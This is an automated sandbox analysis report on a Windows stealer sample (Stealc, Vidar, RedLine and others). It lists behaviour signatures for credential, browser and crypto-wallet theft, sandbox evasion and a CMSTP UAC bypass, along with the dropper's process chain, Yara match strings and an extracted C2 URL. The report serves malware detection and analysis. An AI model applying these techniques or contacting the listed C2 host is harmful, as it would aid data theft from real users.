Edit tour

Windows Analysis Report
R0hb7jyBcv.exe

Overview

General Information

Sample name:	R0hb7jyBcv.exe renamed because original name is a hash value
Original sample name:	74e9f3ba74c619021b87520b083c6a1d.exe
Analysis ID:	1431534
MD5:	74e9f3ba74c619021b87520b083c6a1d
SHA1:	72db70927e2be7ce030ecb812b9ea241b46d7ad0
SHA256:	47307dc63a88e7e1ba5eb0230a0ac39092bd5c284896909d5e9f274f47939483
Tags:	32exeStealctrojan
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected SectopRAT

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected zgRAT

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

R0hb7jyBcv.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\R0hb7jyBcv.exe" MD5: 74E9F3BA74C619021B87520B083C6A1D)

u5g0.0.exe (PID: 5408 cmdline: "C:\Users\user\AppData\Local\Temp\u5g0.0.exe" MD5: 19DF99C6ABEF7763427C6E25F42D5D69)

cmd.exe (PID: 7488 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

IIIJECAEGD.exe (PID: 7552 cmdline: "C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)

WerFault.exe (PID: 7564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 2364 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 6044 cmdline: "C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 1868 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7420 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

u5g0.3.exe (PID: 6460 cmdline: "C:\Users\user\AppData\Local\Temp\u5g0.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)

WerFault.exe (PID: 4632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 7440 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7224 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: StealC

{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\qbji	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\qbji	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\qbji	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\phtshfcnnluilu	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\u5g0.3.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.2130721248.0000000005D60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2130721248.0000000005D60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000000.1840725174.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000010.00000002.2301916799.0000000005210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2301916799.0000000005210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.1841736799.00000000038C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1965167409.00000000008EF000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12d0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2073633195.0000000002F37000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x10b0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000003.1762398985.0000000003020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.1762398985.0000000003020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2302571698.0000000000702000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2302571698.0000000000702000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000F.00000000.2042934542.000001487C95B000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: u5g0.0.exe PID: 5408	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: u5g0.0.exe PID: 5408	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u5g0.0.exe PID: 5408	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: run.exe PID: 6044	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 1868	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 1868	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 1868	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: run.exe PID: 7404	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: MSBuild.exe PID: 7420	JoeSecurity_SectopRAT	Yara detected SectopRAT	Joe Security
Process Memory Space: cmd.exe PID: 7440	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 7440	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7440	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.u5g0.0.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.2.cmd.exe.4c74e64.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
1.2.u5g0.0.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
16.2.cmd.exe.4c74e64.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481a580000.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.cmd.exe.4c30976.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
16.2.cmd.exe.4c30976.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
13.2.run.exe.3044d5b.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.run.exe.3044d5b.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
1.2.u5g0.0.exe.2ed0e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5g0.0.exe.2ed0e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
13.2.run.exe.300086d.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.run.exe.300086d.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
1.3.u5g0.0.exe.3020000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5g0.0.exe.3020000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
16.2.cmd.exe.52100c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.cmd.exe.52100c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.cmd.exe.52100c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
3.2.cmd.exe.52f2264.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.421986d.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.425d15b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.52f2264.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
2.2.run.exe.421986d.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
2.2.run.exe.425d15b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811fbeb15.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811fbeb15.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
24.2.MSBuild.exe.700000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.MSBuild.exe.700000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
24.2.MSBuild.exe.700000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
1.3.u5g0.0.exe.3020000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5g0.0.exe.3020000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
16.2.cmd.exe.4c74264.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
16.2.cmd.exe.4c74264.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
16.2.cmd.exe.52100c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.cmd.exe.52100c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.cmd.exe.52100c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
13.2.run.exe.304415b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.run.exe.304415b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
1.2.u5g0.0.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
